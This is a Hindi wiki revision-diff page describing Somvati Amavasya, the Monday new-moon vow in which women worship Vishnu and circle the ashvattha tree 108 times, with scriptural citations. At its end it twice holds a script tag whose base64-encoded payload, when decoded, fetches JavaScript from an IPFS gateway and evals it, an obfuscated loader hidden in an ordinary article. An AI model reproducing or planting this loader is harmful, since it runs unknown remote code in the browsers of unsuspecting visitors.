व्यवस्थापन (चर्चा | योगदान) छो (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "") |
आदित्य चौधरी (चर्चा | योगदान) छो (Text replace - "उल्लखित" to "उल्लिखित") |
||
पंक्ति 1: | पंक्ति 1: | ||
− | *[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में | + | *[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है। |
*[[सोमवार]] की [[अमावास्या]] अति पुनीत होती है।<ref> कालविवेक (492, [[भविष्यपुराण]] से); हेमाद्रि (काल, 643); (वर्षक्रियाकौमुदी 9)</ref> | *[[सोमवार]] की [[अमावास्या]] अति पुनीत होती है।<ref> कालविवेक (492, [[भविष्यपुराण]] से); हेमाद्रि (काल, 643); (वर्षक्रियाकौमुदी 9)</ref> | ||
*आज के दिन लोग (विशेष रूप से नारियाँ) अश्वत्थ वृक्ष के पास जाती हैं। | *आज के दिन लोग (विशेष रूप से नारियाँ) अश्वत्थ वृक्ष के पास जाती हैं। |
18:53, 25 फ़रवरी 2011 का अवतरण
- भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित हिन्दू धर्म का एक व्रत संस्कार है।
- सोमवार की अमावास्या अति पुनीत होती है।[1]
- आज के दिन लोग (विशेष रूप से नारियाँ) अश्वत्थ वृक्ष के पास जाती हैं।
- विष्णु पूजा करती हैं तथा वृक्ष की 108 बार प्रदक्षिणा करती हैं।[2]
- व्रतार्क का कथन है कि इसका उल्लेख निबन्धों में नहीं हुआ है, यह मात्र प्रचलन पर आधृत है।
टीका टिप्पणी और संदर्भ
- ↑ कालविवेक (492, भविष्यपुराण से); हेमाद्रि (काल, 643); (वर्षक्रियाकौमुदी 9)
- ↑ व्रतार्क (पाण्डुलिपि, 350बी-356); धर्मसिन्धु (23)
संबंधित लेख
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>